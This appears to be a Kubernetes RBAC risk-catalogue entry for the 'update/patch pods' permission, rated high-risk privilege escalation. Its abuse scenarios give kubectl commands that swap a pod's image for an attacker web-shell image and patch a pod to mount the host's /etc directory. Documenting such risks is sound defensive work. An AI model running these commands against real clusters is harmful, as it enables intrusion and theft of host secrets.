Update/Patch pods in a namespace
Elevation of Privilege
High
Overview
| Field | Value |
|---|---|
| ID | 1009 |
| Name | Update/Patch pods in a namespace |
| Risk Category | Elevation of Privilege |
| Risk Level | High |
| Role Type | Role |
| API Groups | core |
| Resources | pods |
| Verbs | update, patch |
| Tags | PotentialPrivilegeEscalation Tampering WorkloadExecution |
Description
Allows modifying existing pods within a specific namespace. This can be used to escalate privileges by changing a pod’s configuration to run with higher permissions, execute arbitrary code, or tamper with application behavior within that namespace.
Abuse Scenarios
- Patch a running pod in the namespace to change its container image.
kubectl set image pod/<pod-name> <container-name>=<malicious-image> -n <namespace>
# Example: kubectl set image pod/my-web-app web=attacker/web-shell -n dev
- Patch a running pod to add a hostPath volume mount (if not blocked by PSP/PSA).
kubectl patch pod <pod-name> -n <namespace> --type='json' -p='[{"op": "add", "path": "/spec/volumes/-", "value": {"name": "host-path-vol", "hostPath": {"path": "/etc"}}}, {"op": "add", "path": "/spec/containers/0/volumeMounts/-", "value": {"name": "host-path-vol", "mountPath": "/mnt/host-etc"}}]'
# Example: kubectl patch pod my-app -n default --type='json' -p='[{"op": "add", "path": "/spec/volumes/-", "value": {"name": "host-path-vol", "hostPath": {"path": "/etc"}}}, {"op": "add", "path": "/spec/containers/0/volumeMounts/-", "value": {"name": "host-path-vol", "mountPath": "/mnt/host-etc"}}]'